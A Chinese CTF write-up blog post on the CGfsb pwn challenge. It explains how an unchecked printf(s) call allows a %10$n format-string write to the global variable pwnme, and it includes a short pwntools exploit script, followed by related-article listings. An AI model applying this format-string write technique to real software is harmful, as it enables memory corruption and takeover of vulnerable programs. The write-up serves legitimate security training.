攻防世界_pwn_CGfsb(萌新版)-pwnme解惑

最新推荐文章于 2023-07-23 15:39:58 发布
最新推荐文章于 2023-07-23 15:39:58 发布
阅读量517 收藏
点赞数
分类专栏: CTF 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30204577/article/details/104480616
版权

0x00 前言

格式化字符串漏洞。

file checksec结果如下所示:

NX打开,就是说堆栈不可执行。

PIE未打开,也就是说,我们在ida中国所看到的就是函数地址在运行过程中的地址。

0x10 步骤

0x11 main函数

在main函数中,我们可以发现printf函数的用法与我们平时使用C语言的习惯不同,这样的用法会给系统带来漏洞,题中要求我们输入s的内容,但是比较的却是pwnme的内容。

再看pwnme的地址,pwnme在bss段,是一个全局变量,如果我们能够通过一种方法把pwnme的内容进行人工改变,那么我们便可以getshell。

%n$:表示的是获取格式化字符串中的指定参数,n表示第几个 ,在这里我们可以通过输入一串字母和%p来查看输入内容在栈中的偏移量。

%n:不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。

自写C程序,便于更好地理解:
图1

看图1,printf的参数只有一个a,就是pwnme的地址,这样前面的%后面就只需要写1,因为此时它是栈内第一个参数(个人认为。。。)

图2
图3

看图3,这时候a的前面有pwnme,这时候它就是第二个参数,所以偏移量为2,则%后面为2,从而这样我们便可以推知本题的pwnme的地址,当我们通过输入%x判断得知偏移量后,便可以通过类似的方法在pwnme的地址处改写其数据,以达到getshell 的目的。

  • addr%k$n:其意思就应该为在地址为addr、偏移量(相对于我们输入处的)为k的位置,写入前面若干个字符串长度的值。

如图所示,AAAA在栈中的偏移量为10,那么就是说我们可以通过%10$n,将前面已经输出的内容的长度放入偏移量为10的参数的位置。

在payload中,我们便需要将pwnme的地址打包,然后又因为pwnme的地址被打包为32位,即长度为4,所以我们依然需要再多输入4个长度的内容。

则payload为:payload = p32(pwnme_addr)+"aaaa" +'%10$n'

0x20 exp

from pwn import *
sh = process("./CGfsb")
pwnme_addr = 0x0804A068
payload = p32(pwnme_addr)+"aaaa" +'%10$n'
sh.recvuntil("name:")
sh.sendline("aaa")
sh.recvuntil("please:")
sh.sendline(payload)
sh.interactive()
TedLau.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 557
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9419
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
week4+5——pwn
w
10-06 139
格式化字符串漏洞 printf函数中的漏洞printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用 一般写为:printf("%d",s) 但有时为了省事会写成:printf(s) 这是一种非常危险的写法。由于printf函数族的设计缺陷,当其第一个参数可被控制时,攻击者将有机会对任意内存地址进行读写操作 当输入print...
写入到a时缓冲区溢出_缓冲区溢出之栈溢出pwnme
weixin_35949298的博客
01-25 1518
声明:由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,知微安全以及文章作者不为此承担任何责任。知微安全拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括权声明等全部内容。未经知微安全允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。0x01 缓冲区?溢出?缓冲区溢出?刚开始看缓冲区溢出的时候,满脑子...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
pwnme3题目
10-14
cmcc的ctf的pwnme3的题目,欢迎大家一起学习交流做题的思路
攻防世界-CGfsb详细知识点及解答
m0_74047686的博客
03-07 685
做这道题的时候,对于格式化字符串的知识要有一定了解,不然的话,就要像我一样,忙来忙去,很麻烦的如何利用格式化字符串呢?我做了一些知识总结。格式化字符串攻击(Format String Vulnerabilities,简称FSV)是指攻击者通过构造恶意格式化字符串控制符,在程序中读写不该被访问的内存区域、获取敏感信息等操作。攻击者通常利用以下方式来实施格式化字符串攻击:(1)打印栈上的数据。
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1819
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
buuctf[cmcc_pwnme1]题解
weixin_46521144的博客
03-26 298
拿到题目,发现getflag函数和简单栈溢出 高兴的尝试了一波,然而发现home目录下没有flag,倒是也正常,没有简单到这种程度 看一下保护 没有开,那也很简单,直接利用栈溢出,ret2libc即可 使用LibcSearcher直接搜索,这题就当是熟练手感了 from pwn import * from LibcSearcher import LibcSearcher context.log_level='debug' # io=process('./pwnme1') io=rem
攻防世界-CGfsb
yuqie的博客
06-30 278
看看附件,先在本地环境打一下,先放入kali查看一下本: 再查看一下保护机制: 可以看出该程序是32位的,保护机制的解释如下:【1】RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表。【2】Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过。【3】NX:NX enabled
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 667
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1591
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3355
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值